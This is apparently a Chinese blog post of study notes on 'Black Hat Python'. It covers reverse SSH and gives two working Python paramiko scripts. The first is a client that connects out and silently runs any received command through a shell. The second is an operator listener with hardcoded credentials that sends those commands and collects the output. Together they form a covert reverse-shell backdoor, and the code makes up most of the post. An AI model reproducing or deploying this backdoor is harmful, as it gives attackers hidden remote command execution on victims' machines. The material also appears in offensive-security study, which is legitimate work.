python黑帽子学习笔记(二)
1.反向ssh。
通常情况下,在使用SSH的时候,你可以使用SSH客户端连接SSH服务器,但是由于Windows本身不一定装有SSH服务端,所以我们需要反向将命令从SSH服务端发送给SSH客户端。
2.代码。
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import threading
import paramiko
import subprocess
def ssh_command(ip,user,passwd,command):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, username=user, password=passwd)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
ssh_session.send(command)
print(ssh_session.recv(1024))
while True:
command = ssh_session.recv(1024) #ssh服务器获取命令
try: # 异常处理当try语句没问题时执行try语句反之跳转至except语句
cmd_output = subprocess.check_output(command,shell=True)
ssh_session.send(cmd_output) #向服务器发送命令执行的结果
except Exception,e:
ssh_session.send(str(e))
client.close()
return
ssh_command('127.0.0.1','root','toor','ClientConnected')
最初的几行代码和上一篇的SSH客户端类似,从while Ture:开始出现新的内容!
接下来我们来创建SSH服务器。
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import socket
import paramiko
import threading
import sys
# 使用 Paramiko示例文件的**
host_key = paramiko.RSAKey(filename='C:\Users\lenovo\.ssh\id_rsa') #你获取的**所在的路径
class Server(paramiko.ServerInterface):
def __init__(self):
self.event = threading.Event()
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_password(self, username, password):
if (username == 'root') and (password == 'toor'):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
server = sys.argv[1]
ssh_port = int(sys.argv[2])
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #TCP socket
#这里value设置为1,表示将SO_REUSEADDR标记为TRUE,操作系统会在服务器socket被关闭或服务器进程终止后马上释放该服务器的端口,否则操作系统会保留几分钟该端口。
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((server, ssh_port)) #绑定ip和端口
sock.listen(100) #最大连接数为100
print '[+] Listening for connection ...'
client, addr = sock.accept()
except Exception, e:
print '[-] Listen failed: ' + str(e)
sys.exit(1)
print '[+] Got a connection!'
try:
bhSession = paramiko.Transport(client)
bhSession.add_server_key(host_key)
server = Server()
try:
bhSession.start_server(server=server)
except paramiko.SSHException, x:
print("[-] SSH negotiation failed.")
chan = bhSession.accept(20)
print("[+] Authenticated!")
print(chan.recv(1024))
chan.send("Welcome to bh_ssh")
while True:
try:
command = raw_input("Enter command: ").strip('\n')
if command != 'exit':
chan.send(command)
print(chan.recv(1024) + '\n')
else:
chan.send('exit')
print("exiting")
except KeyboardInterrupt:
bhSession.close()
except Exception,e:
print("[-] Caught exception:" + str(e))
try:
bhSession.close()
except:
pass
sys.exit(1)
这个代码中我们使用了Paramiko实例文件包含的SSH**,在开启一个套接字监听,之后使用SSH管道并配置认证模式。当一个客户端认证并发回ClientConnected消息,我们输入到服务端的任何命令将发送给客户端并在客户端上执行,输出结果将返回给服务端。
PS:这里就如何获取获取**做一说明。你需要在cmd中运行以下命令,如图获取**。
ssh-****** -t rsa
下面是在主机上的测试:
你可以看到首先我们运行了服务端,之后使用客户端连接。客户端连接成功后我们执行了一条命令。虽然客户端看不到任何情况但是执行命令的结果已经发送给服务端了!